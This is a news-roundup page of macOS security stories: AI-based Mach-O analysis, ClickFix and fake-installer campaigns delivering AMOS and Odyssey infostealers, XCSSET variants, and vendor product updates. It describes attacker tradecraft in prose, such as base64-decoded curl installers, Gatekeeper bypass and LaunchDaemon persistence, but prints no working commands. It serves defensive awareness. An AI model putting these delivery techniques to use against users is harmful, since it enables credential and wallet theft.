All news with #macos tag

AI-Powered Mach-O Analysis Reveals Undetected macOS Threats

🔎VirusTotal ran VT Code Insight, an AI-based Mach-O analysis pipeline against nearly 10,000 first-seen Apple binaries in a 24-hour stress test. By pruning binaries with Binary Ninja HLIL into a distilled representation that fits a large LLM context (Gemini), the system produces single-call, analyst-style summaries from raw files with no metadata. Code Insight flagged 164 samples as malicious versus 67 by traditional AV, surfacing zero-detection macOS and iOS threats while also reducing false positives.

ClickFix attacks add multi-OS support, videos, timers

🔒 ClickFix campaigns have evolved to include embedded video tutorials, an automated OS detector, and a countdown timer to pressure victims into executing pasted commands. Researchers at Push Security observed fake Cloudflare CAPTCHA pages that auto-copy malicious commands to the clipboard and adapt instructions for Windows, macOS, or Linux. Attackers promote these pages via malvertising, SEO poisoning, and compromised sites, then deliver varying payloads such as MSHTA executables and PowerShell scripts. Users are strongly advised never to paste and run terminal commands from unknown web prompts.

ThreatLocker Adds macOS Configuration Scanning Beta

🔒 ThreatLocker has released DAC for macOS in Beta, extending its configuration-scanning capability to Apple endpoints. Using the existing ThreatLocker agent, the feature can scan Macs up to four times daily and surface risky settings—FileVault, firewall, sharing/remote access, admin accounts, Gatekeeper, update policies—directly in the same console used for Windows. Findings are grouped by endpoint and category and include step-by-step remediation plus mappings to frameworks such as CIS, NIST, ISO 27001, and HIPAA. The aim is to make misconfigurations visible and remediable before they become security incidents.

Researchers Expose GhostCall and GhostHire Campaigns

🔍 Kaspersky details two tied campaigns, GhostCall and GhostHire, that target Web3 and blockchain professionals worldwide and emphasize macOS-focused infection chains and social-engineering lures. The attacks deploy a range of payloads — DownTroy, CosmicDoor, RooTroy and others — to harvest secrets, escalate access, and persist. Guidance stresses user vigilance, strict dependency vetting, and centralized secrets management. Kaspersky links the activity to the BlueNoroff/Lazarus cluster and notes the actor has increasingly used generative AI to craft imagery and accelerate malware development.

Google Ads Promote Fake Homebrew, LogMeIn, TradingView Sites

🚨 Researchers uncovered a malvertising campaign that uses Google Ads to surface convincing fake Homebrew, LogMeIn, and TradingView download sites targeting macOS developers. The pages prompt victims to copy a curl command into Terminal, but the clipboard often contains a base64-encoded installer that decodes and runs an install.sh payload. That script removes quarantine flags, bypasses Gatekeeper, and delivers infostealers that check for analysis environments before executing. Operators deploy AMOS and Odyssey, which harvest browsers, wallets, and credentials; users are urged not to paste unknown commands into Terminal.

AWS Client VPN Now Supports macOS Tahoe (26.0) Release

🔒 AWS Client VPN now supports macOS Tahoe (26.0) with client version 5.3.1. You can run the AWS-supplied VPN client on the latest macOS releases; desktop clients are provided free and can be downloaded from the AWS Client VPN download page. AWS Client VPN is a managed service that securely connects remote workers to AWS and on-premises networks and already supports macOS 13–15, Windows 10/11 (x64 and Arm64), and Ubuntu 22.04/24.04. This update helps organizations maintain secure remote access as endpoints upgrade to the latest macOS.

New macOS XCSSET Variant Targets Browsers and Clipboard

🛡️ Microsoft Threat Intelligence reported a new macOS malware variant of XCSSET that introduces browser-targeting changes, clipboard hijacking, and additional persistence mechanisms. The update uses run-only compiled AppleScripts, enhanced obfuscation and encryption, and expands data theft to include Firefox. New modules implement clipper behavior and LaunchDaemon- and Git-based persistence. Users should inspect Xcode projects and avoid pasting sensitive clipboard content.

Microsoft: New XCSSET macOS Variant Targets Xcode Developers

🛡️ Microsoft Threat Intelligence has identified a new variant of the XCSSET macOS infostealer that has appeared in limited attacks and specifically targets Xcode projects. The variant expands capabilities to steal Firefox data using a modified HackBrowserData build, hijack the clipboard to replace cryptocurrency addresses, and employ new persistence techniques. It spreads by infecting shared Xcode project files so malicious code runs when a project is built. Microsoft says the campaign is not widespread and has notified Apple and GitHub while advising developers to inspect projects and keep macOS and apps up to date.

Fake macOS apps on GitHub spread Atomic (AMOS) malware

⚠️ LastPass warns of a macOS campaign that uses fraudulent GitHub repositories to impersonate popular apps and trick users into running Terminal commands. The fake installers deliver the Atomic (AMOS) info‑stealer via a ClickFix workflow: a curl command decodes a base64 URL and downloads an install.sh payload to /tmp. Attackers rely on SEO and many disposable accounts to evade takedowns and boost search rankings. Users should only install macOS software from official vendor sites and avoid pasting unknown commands into Terminal.

LastPass Alerts: Fake GitHub Repos Deliver macOS Infostealer

🛡️ LastPass warns of a widespread campaign leveraging fake GitHub repositories and SEO-poisoned search results to distribute an Atomic-infostealer targeting macOS users. The malicious pages impersonate popular tools such as LastPass, 1Password, and Dropbox, and redirect victims to pages that instruct them to run Terminal commands. Those commands fetch and execute a multi-stage dropper that deploys the Atomic Stealer. Users should verify official vendor pages and avoid running untrusted commands in Terminal.

macOS AMOS Stealer Uses Cracked Apps to Bypass Gatekeeper

🛡️ Trend Micro warns of an Atomic macOS Stealer (AMOS) campaign that lures users with trojanized 'cracked' apps such as CleanMyMac, and instructs victims to run terminal commands. Attackers shifted from .dmg installers to terminal-based installs to evade Gatekeeper enhancements. AMOS persists via a LaunchDaemon and a hidden binary, then exfiltrates credentials, browser data, crypto wallets, Telegram chats and keychain items. Researchers advise layered defenses beyond native OS protections.